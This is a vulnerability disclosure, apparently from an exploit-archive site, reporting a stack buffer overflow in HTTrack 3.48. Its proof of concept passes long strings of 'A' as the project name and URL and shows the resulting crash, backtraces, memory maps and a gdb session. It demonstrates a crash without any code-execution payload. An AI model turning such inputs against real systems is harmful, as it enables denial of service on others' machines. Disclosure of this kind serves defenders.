HTTrack Local Stack Buffer Overflow

2017-05-07 / 2017-05-08

Hosein Askari (CA)

Risk: High

Local: Yes

Remote: No

CVE: N/A

CWE: CWE-119

################
#Exploit Title: HTTrack Local Stack Buffer Overflow
#CWE: CWE-119
#Exploit Author: Hosein Askari
#Vendor HomePage: http://www.httrack.com
#Version : 3.48-22-1(Fedora 25), 3.48-24(Debian)
#Exploit Tested on: Parrot OS
#Date: 07-05-2017
#Category: Application
#Author Mail : hosein.askari@aol.com
#Description: Buffer overflow in URI and Project Name processing in HTTrack and WebHTTrack on version 3.48-22-1 (Fedora 25) and 3.48-24(Debian) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long String.
###############################
---> Wizard command line: httrack AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -O "AAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -%v
Ready to launch the mirror? (Y/n) :y
WARNING! You are running this program as root!
It might be a good idea to run as a different user
*** buffer overflow detected ***: httrack terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x67f4a)[0xb7d7df4a]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78]
/lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8]
/lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f]
/usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86]
/usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526]
/usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
httrack(+0x144b)[0x8000144b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276]
httrack(+0x152e)[0x8000152e]
======= Memory map: ========
80000000-80005000 r-xp 00000000 08:01 1334296 /usr/bin/httrack
80005000-80006000 r--p 00004000 08:01 1334296 /usr/bin/httrack
80006000-80007000 rw-p 00005000 08:01 1334296 /usr/bin/httrack
80007000-80050000 rw-p 00000000 00:00 0 [heap]
b79d7000-b79f3000 r-xp 00000000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1
b79f3000-b79f4000 r--p 0001b000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1
b79f4000-b79f5000 rw-p 0001c000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1
b79f5000-b7a3d000 rw-p 00000000 00:00 0
b7a3d000-b7a40000 r-xp 00000000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so
b7a40000-b7a41000 r--p 00002000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so
b7a41000-b7a42000 rw-p 00003000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so
b7a42000-b7aa9000 r-xp 00000000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1
b7aa9000-b7aac000 r--p 00066000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1
b7aac000-b7ab0000 rw-p 00069000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1
b7ab0000-b7cfa000 r-xp 00000000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7cfa000-b7cfb000 ---p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7cfb000-b7d0c000 r--p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7d0c000-b7d13000 rw-p 0025b000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7d13000-b7d16000 rw-p 00000000 00:00 0
b7d16000-b7ec9000 r-xp 00000000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7ec9000-b7eca000 ---p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7eca000-b7ecc000 r--p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7ecc000-b7ecd000 rw-p 001b5000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7ecd000-b7ed0000 rw-p 00000000 00:00 0
b7ed0000-b7eeb000 r-xp 00000000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11
b7eeb000-b7eec000 r--p 0001a000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11
b7eec000-b7eed000 rw-p 0001b000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11
b7eed000-b7f96000 r-xp 00000000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48
b7f96000-b7f97000 r--p 000a8000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48
b7f97000-b7f99000 rw-p 000a9000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48
b7f99000-b7fb2000 r-xp 00000000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so
b7fb2000-b7fb3000 r--p 00018000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so
b7fb3000-b7fb4000 rw-p 00019000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so
b7fb4000-b7fb6000 rw-p 00000000 00:00 0
b7fd4000-b7fd7000 rw-p 00000000 00:00 0
b7fd7000-b7fd9000 r--p 00000000 00:00 0 [vvar]
b7fd9000-b7fdb000 r-xp 00000000 00:00 0 [vdso]
b7fdb000-b7ffd000 r-xp 00000000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so
b7ffd000-b7ffe000 rw-p 00000000 00:00 0
b7ffe000-b7fff000 r--p 00022000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so
b7fff000-b8000000 rw-p 00023000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
Caught signal 6
httrack(+0x1de3)[0x80001de3]
[0xb7fd9d04]
[0xb7fd9cf9]
/lib/i386-linux-gnu/libc.so.6(gsignal+0xb0)[0xb7d42050]
/lib/i386-linux-gnu/libc.so.6(abort+0x157)[0xb7d43577]
/lib/i386-linux-gnu/libc.so.6(+0x67f4f)[0xb7d7df4f]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78]
/lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8]
/lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f]
/usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86]
/usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526]
/usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
httrack(+0x144b)[0x8000144b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276]
httrack(+0x152e)[0x8000152e]
Please report the problem at http://forum.httrack.com
Aborted (core dumped)
--------------------
(gdb) run
Starting program: /usr/bin/httrack
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
Welcome to HTTrack Website Copier (Offline Browser) 3.48-24
Copyright (C) 1998-2016 Xavier Roche and other contributors
To see the option list, enter a blank line or try httrack --help
Enter project name :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Base path (return=/home/constantine/websites/) :
Enter URLs (separated by commas or blank spaces) :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Action:
(enter) 1 Mirror Web Site(s)
2 Mirror Web Site(s) with Wizard
3 Just Get Files Indicated
4 Mirror ALL links in URLs (Multiple Mirror)
5 Test Links In URLs (Bookmark Test)
0 Quit
:
: 1
Proxy (return=none) :
You can define wildcards, like: -*.gif +www.*.com/*.zip -*img_*.zip
Wildcards (return=none) :
You can define additional options, such as recurse level (-r<number>), separated by blank spaces
To see the option list, type help
Additional options (return=none) :
---> Wizard command line: httrack AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -O "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -%v
Ready to launch the mirror? (Y/n) :y
WARNING! You are running this program as root!
It might be a good idea to run as a different user
*** buffer overflow detected ***: /usr/bin/httrack terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x67f4a)[0xb7d7df4a]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78]
/lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8]
/lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f]
/usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86]
/usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526]
/usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/bin/httrack(+0x144b)[0x8000144b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276]
/usr/bin/httrack(+0x152e)[0x8000152e]
======= Memory map: ========
80000000-80005000 r-xp 00000000 08:01 1334296 /usr/bin/httrack
80005000-80006000 r--p 00004000 08:01 1334296 /usr/bin/httrack
80006000-80007000 rw-p 00005000 08:01 1334296 /usr/bin/httrack
80007000-80050000 rw-p 00000000 00:00 0 [heap]
b79d7000-b79f3000 r-xp 00000000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1
b79f3000-b79f4000 r--p 0001b000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1
b79f4000-b79f5000 rw-p 0001c000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1
b79f5000-b7a3d000 rw-p 00000000 00:00 0
b7a3d000-b7a40000 r-xp 00000000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so
b7a40000-b7a41000 r--p 00002000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so
b7a41000-b7a42000 rw-p 00003000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so
b7a42000-b7aa9000 r-xp 00000000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1
b7aa9000-b7aac000 r--p 00066000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1
b7aac000-b7ab0000 rw-p 00069000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1
b7ab0000-b7cfa000 r-xp 00000000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7cfa000-b7cfb000 ---p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7cfb000-b7d0c000 r--p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7d0c000-b7d13000 rw-p 0025b000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1
b7d13000-b7d16000 rw-p 00000000 00:00 0
b7d16000-b7ec9000 r-xp 00000000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7ec9000-b7eca000 ---p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7eca000-b7ecc000 r--p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7ecc000-b7ecd000 rw-p 001b5000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so
b7ecd000-b7ed0000 rw-p 00000000 00:00 0
b7ed0000-b7eeb000 r-xp 00000000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11
b7eeb000-b7eec000 r--p 0001a000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11
b7eec000-b7eed000 rw-p 0001b000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11
b7eed000-b7f96000 r-xp 00000000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48
b7f96000-b7f97000 r--p 000a8000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48
b7f97000-b7f99000 rw-p 000a9000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48
b7f99000-b7fb2000 r-xp 00000000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so
b7fb2000-b7fb3000 r--p 00018000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so
b7fb3000-b7fb4000 rw-p 00019000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so
b7fb4000-b7fb6000 rw-p 00000000 00:00 0
b7fd4000-b7fd7000 rw-p 00000000 00:00 0
b7fd7000-b7fd9000 r--p 00000000 00:00 0 [vvar]
b7fd9000-b7fdb000 r-xp 00000000 00:00 0 [vdso]
b7fdb000-b7ffd000 r-xp 00000000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so
b7ffd000-b7ffe000 rw-p 00000000 00:00 0
b7ffe000-b7fff000 r--p 00022000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so
b7fff000-b8000000 rw-p 00023000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so
bffdf000-c0000000 rw-p 00000000 00:00 0 [stack]
Program received signal SIGABRT, Aborted.
0xb7fd9cf9 in __kernel_vsyscall ()
(gdb) continue
Continuing.
Caught signal 6
/usr/bin/httrack(+0x1de3)[0x80001de3]
[0xb7fd9d04]
[0xb7fd9cf9]
/lib/i386-linux-gnu/libc.so.6(gsignal+0xb0)[0xb7d42050]
/lib/i386-linux-gnu/libc.so.6(abort+0x157)[0xb7d43577]
/lib/i386-linux-gnu/libc.so.6(+0x67f4f)[0xb7d7df4f]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78]
/lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8]
/lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f]
/usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86]
/usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526]
/usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555]
/usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33]
/usr/bin/httrack(+0x144b)[0x8000144b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276]
/usr/bin/httrack(+0x152e)[0x8000152e]
Please report the problem at http://forum.httrack.com
Program received signal SIGABRT, Aborted.
0xb7fd9cf9 in __kernel_vsyscall ()

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

HTTrack Local Stack Buffer Overflow

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.